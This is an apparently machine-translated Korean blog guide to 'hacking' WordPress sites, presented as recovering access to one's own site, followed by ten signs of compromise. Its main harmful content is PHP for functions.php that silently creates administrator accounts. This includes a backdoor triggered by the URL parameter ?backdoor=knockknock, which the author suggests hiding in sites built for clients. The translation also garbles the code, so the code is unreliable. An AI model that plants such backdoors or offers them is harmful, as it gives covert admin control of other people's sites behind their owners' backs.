WordPress 웹 사이트를 해킹하는 방법, 전체 안내서

WordPress 웹 사이트를 해킹하는 방법, 전체 안내서


우리는 불법적이거나 악의적 인 행동을 묵상, 승인 또는 장려하지 않습니다! 이 기사의 목적은 귀하가 소유 한 WordPress 사이트를 해킹하거나 다시 액세스하는 방법 또는 편집, 관리 및 액세스 권한이있는 방법을 설명하는 것입니다. 당신이 무엇을하든, 당신은 그것을 스스로하고 있습니다.. 우리는 귀하의 행동에 대해 책임을지지 않습니다. 이 안내서는 교육 목적으로 만 사용됩니다.

설명 된 방법을 사용하면 더 이상 계정이 없어도 사이트에 다시 액세스 할 수 있지만 사이트에 대한 정보가 필요하며 임의의 WordPress 설치를 해킹하는 데 도움이되지 않습니다.

이 안내서에서는 다음과 같은 내용을 보여 드리겠습니다.

  • WordPress 웹 사이트를 해킹하는 방법
  • WordPress에서 백도어를 만드는 방법
  • FTP를 통해 새 사용자 계정을 만드는 방법
  • 워드 프레스 사이트가 해킹당한 10 가지 징후

WordPress 웹 사이트를 해킹하는 방법, 전체 안내서

자신을 도울 수있는 상황

다음 상황 중 하나 인 경우 Google의 방법을 통해 액세스 권한을 다시 얻을 수 있습니다.

  • 당신은 사용자 이름이나 이메일 주소를 잊어 버렸습니다
  • 호스팅 서버에서 비밀번호 재설정 옵션이 작동하지 않습니다
  • 비밀번호 재설정 이메일이 전송되지 않습니다
  • 더 이상 계정의 이메일 주소에 액세스 할 수 없습니다
  • 당신은 사용자 이름과 암호를 알고 있지만 조합은 작동하지 않습니다

아래 설명 된 방법을 사용하려면 다음 중 하나만:

  • 서버에 대한 FTP 액세스 또는
  • c 서버에 대한 패널 액세스 또는
  • MySQL 데이터베이스에 액세스하고 원격으로 연결할 수있는 기능

방법 # 1 – MySQL 방식

이 방법을 사용하여 기존 사용자의 비밀번호 (또는 필요한 경우 사용자 이름)를 변경하거나 새 계정을 작성하십시오. 사이트의 데이터베이스에 대한 “cPanel 액세스”또는 직접 MySQL 액세스가 필요합니다.. 기존 사용자의 비밀번호를 변경하여 시작하겠습니다.

cPanel을 사용하는 경우 로그인 (cPanel은 https://yoursite.com:2083 링크)를 찾아 phpMyAdmin을 찾아 엽니 다.. 데이터베이스 및 테이블 목록은 왼쪽에 있습니다.. 끝나는 테이블을 찾고 있습니다. _users. 아마 wp_users, 그러나 서버에 WordPress 사이트가 두 개 이상 설치되어 있으면 올바른 사이트를 찾아야합니다.

오른쪽 표에는 편집하려는 사용자가 있습니다. 같은 외부 클라이언트를 통해 MySQL에 연결하는 경우 동일한 절차를 따르십시오 SQLyog. 테이블과 실제 사용자 레코드를 찾으면 비밀번호를 변경할 차례입니다..

아마 지금까지 알아 낸 것처럼 비밀번호는 user_pass 필드에서 MD5 알고리즘을 사용하여 해시합니다. 를 엽니 다 온라인 MD5 생성기 사용하려는 비밀번호를 입력하고 “해시”를 클릭하십시오. 생성 된 문자열을 복사하고 원래 비밀번호를 바꾸십시오. 그것으로. phpMyAdmin에서 필드를 두 번 클릭하여 편집 할 수 있습니다. 이 절차는 다른 MySQL 클라이언트와 비슷합니다. 새 비밀번호로 변경 사항을 저장하고 WordPress에 로그인.

WP 사용자 테이블

사용자 이름, 해시 비밀번호 및 이메일은 wp_users 데이터베이스 테이블

여전히 방법 # 1 – 새로운 사용자 생성

새로운 사용자를 만드는 것은 조금 더 복잡하지만 1 분 안에 계속 관리 할 수 ​​있습니다.. 새로운 기록을 만드십시오 users 테이블 및 채우기 : user_login, user_pass (해시, 위에서 설명한 MD5 함수를 사용하여 해시) 및 user_email. 다른 모든 필드는 비워 둘 수 있습니다. 그들은 중요하지 않습니다. 새 레코드를 저장하십시오. 일단 저장되면 MySQL은 고유 ID를 부여합니다. ID 필드의 숫자입니다. 기억해.

이제가 _usermeta 표. 생각해 내다, 표의 접두사는 사용자의 접두사와 같아야합니다. 예를 들어 wp_users 과 wp_usersmeta. 접두사가 동일하지 않으면 다른 WP 설치의 잘못된 테이블을 편집하고 새 계정이 작동하지 않는 것입니다. 새로운 레코드 두 개를 만들겠습니다. 무시 umeta_id 둘 다를위한 분야. 세트 user_id 방금 기억 한 값 (사용자 테이블의 새 ID 값)에 첫 번째 레코드 세트 meta_key 에 wpct_user_level 과 meta_value 에 10. 두 번째로 meta_key 에 wpct_capabilities 과 meta_value 에 a : 1 : {s : 13 : "관리자"; b : 1;}. 둘 다 저장하십시오. 완료 – 로그인!

방법 # 2 – functions.php 방법

이 접근법은 cPanel을 통해 functions.php를 편집하거나 FTP 클라이언트를 사용하여 사용할 수 있습니다. cPanel을 사용하는 경우 파일 관리자를 찾아서 엽니 다. 먼저, 활성화 된 테마의 폴더를 찾아야합니다.

이동 public_html / wp_content / themes 폴더. 당신이 즉시 당신의 테마를보고 어떤 테마인지 알면 – 좋습니다. 폴더를 열고 편집을 시작하십시오 functions.php. 그렇지 않은 경우 사이트를 열고 아무 곳이나 마우스 오른쪽 단추로 클릭하고 “소스보기”를 선택하십시오. 그런 다음 Ctrl + F를 누르고 입력을 시작하십시오. / themes / 곧 많은 URL이 강조 표시되고 활성 테마의 폴더 이름이 인식됩니다..

파일 구조에서 찾아서 편집을 시작하십시오. functions.php. 파일 끝에서 다음 코드를 복사 / 붙여 넣기. 닫는 마음 ?> PHP 태그가 있다면. 그들은 마지막 줄에 있어야합니다. 따라서 코드를 앞에 삽입하십시오.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ( 'ID'=> $ user_id, 'nickname'=> $ new_user_email));

$ user = 새로운 WP_User ($ user_id);
$ user-> set_role ( '관리자');
}

코드의 처음 두 줄만 수정하여 새 계정을 반영하십시오.. WP에 해당 이메일을 가진 사용자가 이미있는 경우 새 계정이 생성되지 않으므로 새 계정인지 확인하십시오.. 스크립트 키즈에 의해 해킹 당하지 않도록 비밀번호도 변경하십시오. 파일을 저장 한 후 사이트를 열면 코드가 실행되고 “관리자 권한이있는 새 계정”이 생성되어 해당 계정으로 “로그인”할 수 있습니다.

그런 다음 코드를 삭제해야합니다. functions.php.

다른 해킹 방법

FTP, cPanel 또는 MySQL 비밀번호를 알고 있으면 서버에 대한 올바른 액세스 권한이 있으므로 WordPress 설치에도 액세스 할 수 있음을 증명하는 것입니다. 해당 계정이없는 경우 좋지 않은 상태 (다른 사람의 사이트를 해킹)에 도달하는 것은 좋지 않습니다.!

컴퓨터, 사이트 또는 서버에 대한 무단 액세스는 심각한 범죄이며 대부분의 국가에서 즉시 처리됩니다..

WordPress 사이트가 해킹 당할 우려가있는 경우에는 무료 WordPress 보안 스캐너로이 페이지를 확인하십시오. 블로그를 설정할 시간이 없다면 블로그를 작성해주세요..

WordPress에서 백도어를 만드는 방법

전면 도어가 닫히면 후면 도어를 사용해보십시오. 사이트에 액세스하지 않고 사이트에 들어가기 위해 코드를 사용하는 악의적 인 방법처럼 들릴 수 있지만 실제로 누군가가 사이트를 도용 한 경우 자신의 사이트를 제어해야하는 경우가 있습니다.

다른 사람을 위해 웹 사이트를 만드는 경우 조만간 귀하의 작업에 대한 비용을 지불하지 않는 고객이 있습니다. 귀하의 로그인 정보를 삭제하고 귀하가 한 모든 것을 통제 할 수있는 고객. 때때로, FTP를 통해 새 사용자를 만들거나 비밀번호를 재설정하기에 충분할 수 있습니다. 충분하지 않을 때, 당신은 길을 해킹하거나 관리자 페이지에 대한 백도어 액세스를 만들고 싶을 수도 있습니다..

그러나 WordPress 환경에서 작은 코드 조각을 숨기기로 결정했다면 존엄성과 관리자 권한으로 WordPress 사이트에 액세스. 그리고 그 곳에서 게임이 시작됩니다.

이 도둑이 몇 번이나 정보를 삭제하거나 자신이 소유 한 서버에서 백업을 복원하더라도 백도어 입구에 대해 전혀 알지 못할 가능성이 있습니다. 그가했다면 아마 워드 프레스 설정에 도움이 필요하지 않을 것입니다.?

백도어를 만듭니다.

대화는 충분합니다. 다음은 작업을 완료하는 데 필요한 코드입니다.

  1. functions.php 파일 열기
  2. 다음 코드를 복사 / 붙여 넣기
  3. add_action ( 'wp_head', 'wploop_backdoor');
    함수 wploop_backdoor () {
    If ($ _GET [ 'backdoor'] == 'knockknock') {
    require ( 'wp-includes / registration.php');
    (! username_exists ( 'username')) {
    $ user_id = wp_create_user ( '이름', '통과');
    $ user = 새로운 WP_User ($ user_id);
    $ user-> set_role ( '관리자');
    }
    }
    }
    ?>
  4. 변경 사항을 저장하다

코드를 그대로두면 사이트에서 새 관리자를 만들려면 방문 만하면됩니다. http://www.yourdomain.com/?backdoor=knockknock

페이지가로드 된 후 새 사용자 이름은 “이름” 비밀번호 “통과하다”.

물론이야, 코드에서 변경할 수 있습니다 ‘이름’과‘통과’를 변경하여 당신이 원하는대로. ‘backdoor’및 / 또는 ‘knockknock’을 원하는 것으로 변경하여 백도어 링크를 변경할 수도 있습니다..

이 기능을 사용해보십시오. 재미있을뿐만 아니라 완전히 신뢰할 수없는 사람을 위해 “웹 사이트를 만들려고”할 때 도움이 될 수 있습니다. 당신은 또한 당신의 WordPress 및 블로그 기술을 레벨 업해야합니다.

FTP를 통해 새 사용자 계정을 만드는 방법

WordPress에서 새 “사용자 계정”을 만드는 것은 매우 쉽습니다. 관리자는 사용자 관리 페이지로 이동 모든 사용자 역할에 대한 새 계정을 만들 수 있습니다. 몇 초 만에 완료 할 수 있으며 새로 생성 된 사용자는 지정된 사용자 이름과 비밀번호로 즉시 로그인 할 수 있습니다.

그러나 WordPress 관리자에게 액세스 권한이 없으면 어떻게됩니까? 상황이 조금 더 복잡해 지지만 걱정하지 않아도됩니다. 관리자의 생명을 구할 수있는 기능이 있습니다..

다른 관리자가 계정을 삭제했는지, 실수로 데이터베이스에서 모든 사용자를 삭제했는지, 오작동 플러그인을 사용했거나 해킹 당했는지 여부를 여전히 제어 할 수 있습니다. 때로는 HTTP 서버가 접근 할 수없는 상태에서 FTP 서버에만 액세스 할 수 있으며 새 관리자를 작성해야합니다. 드문 경우이지만 다음 기능을 사용하면.

WordPress 관리 환경 외부에서 새 계정을 만들려면, 사이트에 대한 FTP 액세스 만 있으면됩니다. 관리자는 서버에 로그인하는 데 필요한 모든 정보를 가지고 있어야하며 테마에 새 기능을 작성하여 새 계정을 신속하게 작성할 수 있습니다.

FTP를 통해 새 사용자 계정을 만듭니다.

  1. FTP 클라이언트를 열고 계정에 연결
  2. wp-content / themes로 이동
  3. 사용중인 테마의 폴더를 엽니 다
  4. functions.php 파일을 검색하고 편집하십시오
  5. 다음 기능을 복사하여 붙여 넣습니다.
  6. 기능 admin_account () {
    $ user = '사용자 이름';
    $ pass = '비밀번호';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = 새로운 WP_User ($ user_id);
    $ user-> set_role ( '관리자');
    }}
    add_action ( 'init', 'admin_account');
    
  7. 사용자 이름, 비밀번호 및 이메일을 고유 한 이름으로 변경
  8. 변경 사항을 저장하다

기능에서 설정 한 사용자 이름, 비밀번호 및 이메일 주소가 고유한지 확인하십시오 그렇지 않으면 기능이 제대로 작동하지 않습니다. 변경 사항을 저장하면 완료되었으며 WP 로그인 패널로 이동할 수 있습니다. 새로운 정보를 사용하여 다시 로그인하고 계정을 확인한 후 functions.php 파일에서 기능을 삭제할 수 있습니다.

위에 표시된 기능은 관리자 계정을 만들지 만 다른 사용자 역할을 가진 계정을 만들도록 쉽게 수정할 수 있습니다. 간단히 8의 역할을 바꾸다 열 편집자, 작성자, 기고자, 구독자 또는 귀하가 만든 기타 사용자 역할에 대한 코드.

불행히도, 관리자 계정을 잃어버린 경우 해당 사용자 이름으로 작성된 모든 게시물도 잃어 버렸습니다. 그렇기 때문에 쉽게 검색 할 수 있도록 항상 “백업을 유지”해야합니다. 관리자 계정을 가지고있는 동안이 내용을 읽고 있다면, 이를 백업으로 즉시 만들 수있는 알림으로 사용하십시오. 나중에 WordPress 이외의 계정을 만들어야하는 경우를 대비하여이 기사를 즐겨 찾기에 추가하십시오..

워드 프레스 사이트가 해킹당한 10 가지 징후

워드 프레스는 거대한 블로그 플랫폼입니다. 수백만 명의 사용자가 있으며 매일 매일 빠르게 증가하고있는 것으로 보입니다. 사람들은 다른 컨텐트 관리 시스템에서 만든 웹 사이트를 생각보다 자주이 오픈 소스 시스템으로 옮기는 경향이 있습니다. 그리고 이것이 좋은 반면, 이것은 해커는 또한 임의의 사이트에 침입하려고 할 때 워드 프레스를 최고의 자리에 놓을 것입니다.

일반적으로 해킹 당하면 즉시 알게됩니다. 귀하의 사이트에 액세스 할 수 없게됩니다. 로그인 할 수 없으며 때때로 해커가 첫 페이지에 메시지를 남길 수도 있습니다. 그러나 더 자주, 무언가가 바뀌 었다는 것을 눈치 채지 못할 수도 있습니다. 이 기사의이 부분에서는 WordPress 사이트가 해킹 당했음을 나타내는 몇 가지 징후와 문제에 대한 몇 가지 해결책을 보여 드리겠습니다..

1. 로그인 실패

이 표시는 거의 분명하다. 문제없이 한동안 사용자 이름과 비밀번호 조합을 사용한 경우 갑자기 WordPress에서 계정을 인식하지 못하면 의심 스러울 수 있습니다. 해커가 사이트에 로그인해야 할 경우 관리자 권한을 빠르게 변경할 수 있습니다..

암호를 변경하거나 계정을 완전히 삭제했을 수 있습니다. WordPress에서 처음 잘못된 사용자 이름 / 암호를 표시 한 후 패닉을 시작하기 전에 잘못된 조합을 입력했거나 Caps Lock 단추를 켰을 수 있습니다..

해결책: 이메일을 통해 비밀번호를 복구하거나 다른 계정을 사용하여 다시 로그인하십시오. 로그인 상태를 안전하게 유지하려면 설치를 권장합니다 로그인 닌자 워드 프레스 용 플러그인.

2. 귀하의 사이트에 악성 콘텐츠가 추가되었습니다

사이트에 악성 코드 경고가 포함되어 있습니다

사이트에서 익숙하지 않은 콘텐츠를 발견하기 시작하면 걱정할 수 있습니다. 그들이 당신의 관리 영역에 액세스 할 수있는 기회를 얻을 때, 해커는 핵심과 테마 및 플러그인 파일을 모두 변경할 수 있습니다.. 그것은 그들이 원하는 것을 바꿀 수 있다는 것을 의미합니다..

일부 해커는 사이트의 모양을 대폭 수정하고 해킹 당했다고 생각할 수도 있지만 다른 해커는 훨씬 미묘합니다..

해결책: 웹 사이트 코드에서 숨겨진 컨텐츠를 찾아보십시오. 사이트 바닥에 악성 해커가 설치되어 있거나 고객에게 정기적으로 열리는 팝업을 설치했을 수 있습니다. “보안 닌자”를 사용하여 사이트를 스캔하거나 이러한 문제가 있는지 지속적으로 모니터하십시오.

3. 의심스러운 방문

웹 사이트를 추적하지 않는 경우 즉시 시작해야합니다. 간단한 방법은 Google Analytics를 사용하는 것입니다.이 기능은 다른 여러 기능 중에서 방문 횟수와 방문 위치를 알려줍니다. 얼마 후 웹 사이트를 알게 될 것입니다. 즉, 방문이 어디에서 오는지 알 수 있으며 새 캠페인을 시작할 때와 새로운 프로모션 링크가 언제 출시되는지 알 수 있습니다..

그러나 사이트에서 의심스러운 도메인에서 수많은 신규 방문이 발생하고 있음을 갑자기 알게되면, 사이트가 해킹 당할 수 있으므로이 문제를 자세히 조사하고 싶을 것입니다. 일반적으로 이러한 종류의 방문은 이탈률이 100 %이므로 한 페이지에만 액세스했음을 의미합니다. 해커는 다른 나쁜 사이트를 귀하의 사이트로 안내하는 자동화 된 시스템을 자주 사용합니다. 사이트에서 실행되는 잘못된 코드이거나 스팸 네트워크의 일부가 되었더라도 문제가 심각해질 수 있으며 사이트에서 악성 코드가 있는지 확인해야합니다.

해결책: 사용하다 Google 웹 마스터 도구 의심스러운 도메인을 찾으려면

4. 교통 체증의 급격한 감소

안전한 브라우징 사이트 상태

해킹당하는 마지막 언급과는 달리 방문 횟수가 갑자기 줄어들 기 때문에이 경고가 표시 될 수 있습니다. 새로운 방문을 추천하는 대신, 해커가 귀하의 사이트에서 방문을 보낼 수 있습니다. 해커가 사이트를 다른 사이트로 리디렉션했기 때문에 발생할 수 있습니다. 방문자 수를 줄이는 또 다른 이유는 Google이 사이트를 블랙리스트에 올렸기 때문입니다. 이 작업은 사이트가 감염되어 사이트를 열지 않기로 선택한 모든 사용자에게 메시지를 표시합니다..

해결책: Google 사용 안전한 브라우징 사이트 상태 사이트가 안전하지 않은 것으로 표시되어 현재 방문하기에 위험한지 확인.

5. 검색 엔진 결과가 이상합니다

사이트에서 변경된 사항을 발견하지 못했지만 Google 및 기타 검색 엔진의 검색 결과가 이상하다는 것을 발견하면 (다른 제목 및 기타 메타 데이터 표시) 해킹 된 사이트의 명백한 징후 일 수 있습니다. 해커가 전문가 만 볼 수있는 방식으로 콘텐츠를 변경했을 수 있습니다. 그래도 변경 사항은 검색 엔진 결과에 표시됩니다.

해결책:로 사이트를 확인하십시오 Google 웹 마스터 도구, 사이트가 해킹 당했는지 확인하십시오. 무료 온라인 도구.

6. 이메일을 보내거나받을 수 없습니다

해커가 사이트에 액세스하면 다른 사람을 스팸 메일로 서버를 사용. WordPress에서 새 이메일을 보내거나받을 수 없다는 것을 알게되면 해킹 당했음을 알 수 있습니다. 이메일을 다시 한 번 확인한 다음 제공 업체에 확인하여 오류가 없는지 확인하십시오..

해결책: 워드 프레스 테스트 메일 기능 이 무료 플러그인으로.

7. 사이트가 존재하지 않습니다

서버를 찾을 수 없습니다

해커가 사이트에 액세스하여 악성 코드를 생성하거나 사용자를 리디렉션하거나 스팸으로 전자 메일을 사용하지 않는 경우가 있습니다. 때때로, 그들이 원하는 것은 사이트를 크래시하는 것입니다.. 드물게 해커가 전체 서버에서 모든 것을 성공적으로 삭제합니다. 그렇기 때문에 유명한 호스팅 회사에서 파일을 호스팅하여 보안을 유지하고 매일 또는 매주 웹 사이트 백업을 유지하는 것이 중요합니다. 사이트를 빠르게 복원 할 수 있도록 때때로 자체 백업을 수행하는 것이 좋습니다..

해결책: WordPress에서 백업 관리를위한 최고의 플러그인 중 하나를 설치하십시오..

8. 의심스러운 파일

기존 파일에 추가 될 수있는 악성 콘텐츠와 유사, 해커가 루트 폴더 내에서 추가 파일을 심을 수 있습니다. WordPress와 관련된 길을 아는 것이 좋지만, 경험이 없다면 모든 파일과 활동을 확인할 수있는 보안 도구를 준비해야합니다. 최근에, 우리는 모든 WordPress 파일을 확인하기위한 완벽한 도구 인 Security Ninja를 검토했습니다..

해결책: WordPress 설치에 속하지 않은 파일을 찾으십시오. 보안 닌자를 사용하여 정기적으로 사이트를 스캔하고 해당 파일을 자동으로 찾으십시오. 그런 다음 파일을 삭제하거나 감염된 파일에서 악성 코드를 제거하십시오. Security Ninja 용 핵심 스캐너 애드온을 잊지 마십시오.

9. 신입 회원

사이트에 따라 새 회원을 추가 할 수있는 유일한 사람 일 수 있습니다. 이 경우 새로 등록 된 사용자에 대한 이메일이 경보를 트리거 할 수 있습니다. 새 회원을 추가 할 수있는 다른 관리자가있는 경우 의심스러운 활동에 대해 그들과 확인하십시오.

해결책: 무료 플러그인으로 로그인 URL을 변경하고, .htpasswd 파일을 사용하여 WordPress 로그인 페이지에 대한 액세스를 제한하고, 로그인 닌자를 사용하여 로그인 양식을 항상 보호하십시오..

10. 서버에서 예정된 이벤트를 확인하십시오.

때때로, 해커는 일단 귀하의 웹 사이트가 침입 한 후에는 귀하의 웹 사이트에 어떤 일도하지 않을 것입니다., 그들은 예정된 이벤트를 떠날 것입니다 나중에 사이트를 손상시킬 수 있습니다. 이 기술은 해커가 처음에는 경험이없는 피해자를 실마리로 남겨 둘 수 있기 때문에 위험합니다. 당신은 감염되어 그것에 대해 아무것도 모른다.

해결책: 사용중인 서버에서 CRON 작업을 확인하고 의심스러운 예약 된 작업이 없는지 확인하십시오..

마무리

이 기사가 더 안전한 WordPress 사이트를 관리하는 데 도움이되며 나쁜 상황에서 사이트에 다시 액세스하는 데 도움이되기를 바랍니다. 과 사이트가 깨끗하더라도 당연한 것으로 여기지 마십시오.
블로그는 항상 가능한 안전해야합니다. 대부분의 시간을 절약 할 수있는 WordPress 용 보안 플러그인을 제안합니다. 그래도 안전하지 않은 비밀번호를 사용하지 말고 자신의 WordPress 사이트를 해킹 할 때는주의하십시오.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Liked Liked